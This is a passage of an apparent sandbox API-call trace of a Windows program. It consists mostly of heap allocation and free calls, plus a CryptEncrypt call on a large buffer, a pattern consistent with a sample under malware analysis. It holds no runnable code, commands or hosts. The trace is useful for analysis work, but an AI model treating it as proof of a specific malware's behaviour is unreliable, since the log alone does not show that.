lpUsedDefaultChar=0x0) returned 13 [0088.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.642] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0088.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a78430 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0088.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0088.643] CryptEncrypt (in: hKey=0x9a4280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc8020*, pdwDataLen=0x8cef60*=0xf0b30, dwBufLen=0xf0b38 | out: pbData=0x3cc8020*, pdwDataLen=0x8cef60*=0xf0b38) returned 1 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69760 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0088.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0088.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0088.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0088.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0088.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684b0 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0088.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2ace888 [0088.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0088.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0088.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf0b38) returned 0x3dcd020 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69790 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0088.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf0b38) returned 0x3ecf020 [0088.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3dcd020 | out: hHeap=0x2af0000) returned 1 [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0088.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.951] RtlAllocateHeap (HeapHandle=0x2af0000, 